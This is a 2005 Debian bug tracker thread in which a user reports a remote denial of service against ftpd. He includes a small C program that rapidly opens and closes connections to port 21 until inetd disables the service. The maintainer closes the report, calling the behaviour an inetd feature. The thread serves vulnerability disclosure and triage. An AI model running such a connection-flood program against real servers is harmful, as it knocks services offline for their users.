Your message dated Wed, 13 Jul 2005 22:13:13 +0200
with message-id <[EMAIL PROTECTED]>
and subject line Bug#318144: ftpd remote DoS
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 13 Jul 2005 18:51:25 +0000
>From [EMAIL PROTECTED] Wed Jul 13 11:51:25 2005
Return-path: <[EMAIL PROTECTED]>
Received: from wproxy.gmail.com [64.233.184.204]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DsmKK-0005VH-00; Wed, 13 Jul 2005 11:51:24 -0700
Received: by wproxy.gmail.com with SMTP id i5so255994wra
for <[EMAIL PROTECTED]>; Wed, 13 Jul 2005 11:51:23 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=beta; d=gmail.com;
h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
b=RKP/GfPLLYg3YcVPGcOV+eX5KLzpr6K5uX13HPTtMg+GH9PqYxHT0Bsj9NrlZv6GVao2K5OrfQXFwDcU0acqRAu8Lz0+o6ZfyW3M267JYKQ8pgiWyNh0CieRFAp6bgYegIwwCo9xfbDvsHZPrHqlZRWBflYnx65qzoAvxYmvuqQ=
Received: by 10.54.57.62 with SMTP id f62mr411654wra;
Wed, 13 Jul 2005 11:50:16 -0700 (PDT)
Received: by 10.54.95.11 with HTTP; Wed, 13 Jul 2005 11:50:15 -0700 (PDT)
Message-ID: <[EMAIL PROTECTED]>
Date: Wed, 13 Jul 2005 11:50:15 -0700
From: Cameron Eure <[EMAIL PROTECTED]>
Reply-To: Cameron Eure <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: ftpd remote DoS
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
Package: ftpd
Status: install ok installed
Maintainer: Alberto Gonzalez Iniesta <[EMAIL PROTECTED]>
Architecture: i386
Version: 0.17-21
I'm currently running Debian testing with a few packages from unstable.
I've discovered a vulnerability which would allow a remote denial of
service attack in the ftpd program. It is caused by someone rapidly
opening a socket, connecting server, then closeing the socket, and
I've written a small example which can be examined below.
Here's a timeline of what an attack might look like:
* program rapidly opens a socket, connect()'s, then closes the socket
* inetd redundantly reports: in.ftpd: connect from [host]
* inetd, then, reports the message: ftp/tcp server failing (looping),
service terminated
* existing connections continue to work, however,
* since ftpd is down, no new connections can be established
* after about ten minutes, ftpd is restarted
As promised, here's an example program. This will attempt to use the
first arguement as an IP address if one is supplied, otherwise it will
use 127.0.0.1.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int sock;
struct sockaddr_in addr;
void open_socket()
{
=09
=09sock =3D socket(AF_INET, SOCK_STREAM, 0);
=09
=09if ( connect(sock, (struct sockaddr *)&addr, sizeof (struct sockaddr)) <=
0 )
=09{
=09=09fprintf(stderr, "Error\n");
=09=09close(sock);
=09=09exit(1);
=09}
}
int main(int argc, char * argv[])
{
=09
=09char * address =3D "127.0.0.1";
=09int port =3D 21;
=09if (argc =3D=3D 2)
=09=09address =3D argv[1];
=09
=09
=09addr.sin_family =3D AF_INET;
=09addr.sin_addr.s_addr =3D inet_addr(address);
=09addr.sin_port =3D htons(port);
=09
=09
=09int over =3D 0;
=09printf("Assaulting server\n");
=09
=09while (over < 100)
=09{
=09=09open_socket();
=09=09close(sock);
=09=09
=09=09over++;
=09}
=09
=09return 0;
=09
}
---------------------------------------
Received: (at 318144-close) by bugs.debian.org; 13 Jul 2005 20:15:18 +0000
>From [EMAIL PROTECTED] Wed Jul 13 13:15:18 2005
Return-path: <[EMAIL PROTECTED]>
Received: from smtp-2.hut.fi [130.233.228.92]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DsndV-00068I-00; Wed, 13 Jul 2005 13:15:17 -0700
Received: from localhost (katosiko.hut.fi [130.233.228.115])
by smtp-2.hut.fi (8.12.10/8.12.10) with ESMTP id j6DKEk8Y009676;
Wed, 13 Jul 2005 23:14:46 +0300
Received: from smtp-2.hut.fi ([130.233.228.92])
by localhost (katosiko.hut.fi [130.233.228.115]) (amavisd-new, port 10024)
with LMTP id 05696-34-7; Wed, 13 Jul 2005 23:14:45 +0300 (EEST)
Received: from var.inittab.org (a130-233-5-72.debconf5.hut.fi [130.233.5.72])
by smtp-2.hut.fi (8.12.10/8.12.10) with ESMTP id j6DKCIte008938;
Wed, 13 Jul 2005 23:12:34 +0300
Received: by var.inittab.org (Postfix, from userid 1000)
id C4C7C18001025; Wed, 13 Jul 2005 22:13:13 +0200 (CEST)
Date: Wed, 13 Jul 2005 22:13:13 +0200
From: Alberto Gonzalez Iniesta <[EMAIL PROTECTED]>
To: Cameron Eure <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: Bug#318144: ftpd remote DoS
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
In-Reply-To: <[EMAIL PROTECTED]>
User-Agent: Mutt/1.5.9i
X-TKK-Virus-Scanned: by amavisd-new-2.1.2-hutcc at katosiko.hut.fi
Content-Transfer-Encoding: quoted-printable
X-MIME-Autoconverted: from 8bit to quoted-printable by smtp-2.hut.fi id
j6DKEk8Y009676
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
X-CrossAssassin-Score: 2
On Wed, Jul 13, 2005 at 11:50:15AM -0700, Cameron Eure wrote:
> Package: ftpd
> Status: install ok installed
> Maintainer: Alberto Gonzalez Iniesta <[EMAIL PROTECTED]>
> Architecture: i386
> Version: 0.17-21
>=20
> I'm currently running Debian testing with a few packages from unstable.
>=20
> I've discovered a vulnerability which would allow a remote denial of
> service attack in the ftpd program. It is caused by someone rapidly
> opening a socket, connecting server, then closeing the socket, and
> I've written a small example which can be examined below.
>=20
> Here's a timeline of what an attack might look like:
>=20
> * program rapidly opens a socket, connect()'s, then closes the socket
> * inetd redundantly reports: in.ftpd: connect from [host]
> * inetd, then, reports the message: ftp/tcp server failing (looping),
> service terminated
Right, that's not a bug. It's a feature. And it (as your logs say) is a
*inetd* feature, nothing to do with the ftpd server.
Take a look at the inetd docs and you'll see how to control that
feature.
Closing it.
Regards,
Alberto
--=20
Alberto Gonzalez Iniesta | Formaci=F3n, consultor=EDa y soporte t=E9cn=
ico
agi@(inittab.org|debian.org)| en GNU/Linux y software libre
Encrypted mail preferred | http://inittab.com
Key fingerprint =3D 9782 04E7 2B75 405C F5E9 0C81 C514 AF8E 4BA4 01C3
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
